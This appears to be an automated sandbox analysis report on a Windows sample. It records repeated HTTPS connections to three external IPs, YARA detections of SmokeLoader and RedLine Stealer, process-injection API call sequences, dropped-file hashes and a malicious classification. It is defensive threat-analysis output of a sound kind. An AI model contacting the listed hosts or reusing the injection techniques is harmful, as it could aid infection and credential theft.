    Source: unknownNetwork traffic detected: HTTP traffic on port 57839 -> 443
    Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:57793 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:57794 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:57795 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:57796 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:57797 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:57798 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:57799 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:57800 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:57801 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:57802 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:57803 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:57804 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:57805 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:57806 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:57807 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:57808 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:57809 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:57810 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:57811 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:57812 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:57813 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:57814 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:57815 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:57816 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:57817 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:57818 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:57819 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:57820 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:57821 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:57822 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:57823 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:57825 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:57826 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:57828 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:57829 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:57830 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:57832 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:57833 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:57834 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:57836 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:57837 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:57839 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:57840 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:57841 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:57843 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:57844 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:57845 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:57847 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:57848 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:57849 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:57851 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:57852 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:57853 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:57855 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:57856 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:57857 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:57859 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:57860 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:57861 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:57863 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:57864 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:57865 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:57867 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:57868 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:57869 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:57871 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:57872 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:57873 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:57875 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:57876 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:57877 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:57879 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:57880 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:57881 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:57883 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:57884 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:57885 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:57887 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:57888 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:57889 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:57891 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:57892 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:57893 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:57895 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:57896 version: TLS 1.2

    Key, Mouse, Clipboard, Microphone and Screen Capturing

    barindex
    Yara detected SmokeLoader
    Source: Yara matchFile source: 00000004.00000002.2371278649.0000000003D01000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000002.2371203663.0000000003CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.2143935688.0000000002220000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.2144060492.0000000002241000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

    System Summary

    barindex
    Malicious sample detected (through community Yara rule)
    Source: 00000004.00000002.2371154176.0000000003CB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
    Source: 00000004.00000002.2371278649.0000000003D01000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 00000000.00000002.2143851890.0000000002200000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
    Source: 00000004.00000002.2370964551.0000000002118000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
    Source: 00000004.00000002.2371203663.0000000003CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 00000000.00000002.2143935688.0000000002220000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 00000000.00000002.2144344301.00000000022F9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
    Source: 00000000.00000002.2144060492.0000000002241000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
    Source: C:\Users\user\Desktop\cOm0MmeV34.exeCode function: 0_2_00401538 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401538
    Source: C:\Users\user\Desktop\cOm0MmeV34.exeCode function: 0_2_00402FE9 RtlCreateUserThread,NtTerminateProcess,0_2_00402FE9
    Source: C:\Users\user\Desktop\cOm0MmeV34.exeCode function: 0_2_004014DE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014DE
    Source: C:\Users\user\Desktop\cOm0MmeV34.exeCode function: 0_2_00401496 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401496
    Source: C:\Users\user\Desktop\cOm0MmeV34.exeCode function: 0_2_00401543 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401543
    Source: C:\Users\user\Desktop\cOm0MmeV34.exeCode function: 0_2_00401565 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401565
    Source: C:\Users\user\Desktop\cOm0MmeV34.exeCode function: 0_2_00401579 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401579
    Source: C:\Users\user\Desktop\cOm0MmeV34.exeCode function: 0_2_0040157C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_0040157C
    Source: C:\Users\user\AppData\Roaming\tcgcucaCode function: 4_2_00401538 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401538
    Source: C:\Users\user\AppData\Roaming\tcgcucaCode function: 4_2_00402FE9 RtlCreateUserThread,NtTerminateProcess,4_2_00402FE9
    Source: C:\Users\user\AppData\Roaming\tcgcucaCode function: 4_2_004014DE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_004014DE
    Source: C:\Users\user\AppData\Roaming\tcgcucaCode function: 4_2_00401496 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401496
    Source: C:\Users\user\AppData\Roaming\tcgcucaCode function: 4_2_00401543 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401543
    Source: C:\Users\user\AppData\Roaming\tcgcucaCode function: 4_2_00401565 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401565
    Source: C:\Users\user\AppData\Roaming\tcgcucaCode function: 4_2_00401579 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401579
    Source: C:\Users\user\AppData\Roaming\tcgcucaCode function: 4_2_0040157C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_0040157C
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A7914D30 RtlDeleteBoundaryDescriptor,NtQuerySystemInformation,RtlAllocateHeap,7_2_00007FF6A7914D30
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A79358E0 NtReadVirtualMemory,7_2_00007FF6A79358E0
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A7936240 NtAllocateVirtualMemory,7_2_00007FF6A7936240
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A7936650 NtProtectVirtualMemory,7_2_00007FF6A7936650
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A79344B0 NtQueryInformationProcess,7_2_00007FF6A79344B0
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A7935A30 NtWriteVirtualMemory,7_2_00007FF6A7935A30
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A78EE1D07_2_00007FF6A78EE1D0
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A79328007_2_00007FF6A7932800
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A79511A07_2_00007FF6A79511A0
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A79234E07_2_00007FF6A79234E0
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A78FD8F07_2_00007FF6A78FD8F0
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A79016F07_2_00007FF6A79016F0
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A792E4C07_2_00007FF6A792E4C0
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A78F68EB7_2_00007FF6A78F68EB
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A78FA7107_2_00007FF6A78FA710
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A78E21107_2_00007FF6A78E2110
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A79339207_2_00007FF6A7933920
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A79319007_2_00007FF6A7931900
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A78E15207_2_00007FF6A78E1520
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A78D48507_2_00007FF6A78D4850
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A78E36507_2_00007FF6A78E3650
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A7934A607_2_00007FF6A7934A60
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A78DEA407_2_00007FF6A78DEA40
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A79128707_2_00007FF6A7912870
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A79088707_2_00007FF6A7908870
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A7919E707_2_00007FF6A7919E70
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A78E04707_2_00007FF6A78E0470
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A79292407_2_00007FF6A7929240
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A7902A607_2_00007FF6A7902A60
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A7952E507_2_00007FF6A7952E50
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A78FF6907_2_00007FF6A78FF690
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A78D92907_2_00007FF6A78D9290
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A78DA0807_2_00007FF6A78DA080
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A79152B07_2_00007FF6A79152B0
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A79594B07_2_00007FF6A79594B0
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A78EC8B07_2_00007FF6A78EC8B0
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A793D67B7_2_00007FF6A793D67B
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A79116807_2_00007FF6A7911680
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A79248907_2_00007FF6A7924890
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A78D5FD07_2_00007FF6A78D5FD0
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A78E57D07_2_00007FF6A78E57D0
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A792CFE07_2_00007FF6A792CFE0
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A79367E07_2_00007FF6A79367E0
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A79275E07_2_00007FF6A79275E0
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A794CFE07_2_00007FF6A794CFE0
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A793D5E37_2_00007FF6A793D5E3
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A794B3E07_2_00007FF6A794B3E0
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A78F2DC07_2_00007FF6A78F2DC0
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A790E3F07_2_00007FF6A790E3F0
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A791EBF07_2_00007FF6A791EBF0
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A78FADF07_2_00007FF6A78FADF0
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A78DB9F07_2_00007FF6A78DB9F0
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A79381C07_2_00007FF6A79381C0
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A79201C07_2_00007FF6A79201C0
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A7957FC07_2_00007FF6A7957FC0
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A792B7D07_2_00007FF6A792B7D0
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A79399D07_2_00007FF6A79399D0
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A79485D07_2_00007FF6A79485D0
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A78EB8007_2_00007FF6A78EB800
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A7935A307_2_00007FF6A7935A30
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A79258307_2_00007FF6A7925830
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A79502007_2_00007FF6A7950200
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A79445607_2_00007FF6A7944560
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A78D11407_2_00007FF6A78D1140
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A78D3F707_2_00007FF6A78D3F70
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A78ED3607_2_00007FF6A78ED360
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A79219507_2_00007FF6A7921950
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A794ED507_2_00007FF6A794ED50
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A79227A07_2_00007FF6A79227A0
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A793D7AB7_2_00007FF6A793D7AB
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A78DC3807_2_00007FF6A78DC380
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A790F9B07_2_00007FF6A790F9B0
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A78F67A67_2_00007FF6A78F67A6
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A79299907_2_00007FF6A7929990
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A79313907_2_00007FF6A7931390
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\5587.exe 3E527E17DC87EEAA61804F9C23FD0E11FA545C684E88366EAEB4F228C1EFC49B
    Source: 5587.exe.2.drStatic PE information: No import functions for PE file found
    Source: cOm0MmeV34.exe, 00000000.00000000.2047198603.000000000207F000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesOdilesig6 vs cOm0MmeV34.exe
    Source: cOm0MmeV34.exeBinary or memory string: OriginalFilenamesOdilesig6 vs cOm0MmeV34.exe
    Source: cOm0MmeV34.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: 00000004.00000002.2371154176.0000000003CB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
    Source: 00000004.00000002.2371278649.0000000003D01000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000000.00000002.2143851890.0000000002200000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
    Source: 00000004.00000002.2370964551.0000000002118000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: 00000004.00000002.2371203663.0000000003CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000000.00000002.2143935688.0000000002220000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000000.00000002.2144344301.00000000022F9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: 00000000.00000002.2144060492.0000000002241000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: cOm0MmeV34.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: tcgcuca.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: classification engineClassification label: mal100.troj.evad.winEXE@11/4@3/8
